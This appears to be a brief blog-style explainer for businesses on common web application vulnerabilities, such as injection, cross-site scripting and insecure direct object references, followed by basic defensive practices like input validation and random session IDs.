Businesses are concerned with
the problem of penetration into their using web apps by unauthorized persons.
Organization uses applications to provide better service to customers. But if
these apps are compromised by unauthorized code then the business loses integrity.
Now a day, it is our big
concern to protect our business apps from being compromised. The first step is
to understand how and why apps are compromised.
Why the web apps are vulnerable?
Web codes are mainly HTML. HTML
is a clear text language which is visible to anyone by visiting the sites.
Hackers can easily modify the code and add functionalities that either act
differently or obstruct existing functionality.
Hackers can penetrate code in
the following ways:
Injection: The
attacker injects malicious code into the web code. This malicious code is
written to extract information from the client’s computer or device for unscrupulous
use.
Cross Site Scripting
(XSS): Hacker inserts a script into the code that is run at the
client’s site. This script may be for extracting information or providing
misinformation in order to undermine competition.
Identity Theft: Here
the attacker assumes the identity of the user and accesses important or
sensitive data. The hacker then can use this data to cause inconvenience or
loss to the user.
Direct Object Reference: This
type of risk occurs when objects such as tables within a database are directly
referenced in the URL. The hacker can use this object to access related objects
within the database.
Insecure cryptography: Sensitive
data such as credit card information, bank details, SSN etc. may be hacked by
corrupt persons if they are stored, or travel over the internet, encoded in a
simple and easy to break code.
Insufficient Layering: Applications
that do not encrypt and decrypt data or authenticate users, or check
certificates, may be used by hackers to gather personal data of the users.
How to avoid these risks
The above list is not full but
does cover some major areas of vulnerability. Developers, web designers,
SQA/Test staffs can counter these vulnerabilities by being aware of them and
including code that will look out for malicious code.
Basic Security Practices for Web Applications:
- Applications use data entered into forms to
access databases. If this data is validated before accessing the database,
injections can frequently come to light. Proper validation can also detect
malicious scripts entered into the code.
- Coders must assume that any data entered by
users is untrusted. All inputs must be validated before use. Checking for type,
length, format, and range are the common ways in which inputs are validated.
- Identity thefts and broken authentications can
be prevented by forcing a user to re-login even though he has not explicitly
logged out. When a user logs in to a site an id is created. If this id is
created using a predictable formula then hackers can pinch that identity and
resend it to access client information. Generating random id is the best way to
avoid risks of identity thefts.
- Randomizing ids can also mitigate attacks due to
direct object reference. In fact, databases should never be directly accessed
by user entered data. Applications should validate and clean data before
accessing databases.
- Most importantly, the infrastructure used to run
applications including hardware, software, OS and other components must be
secured.
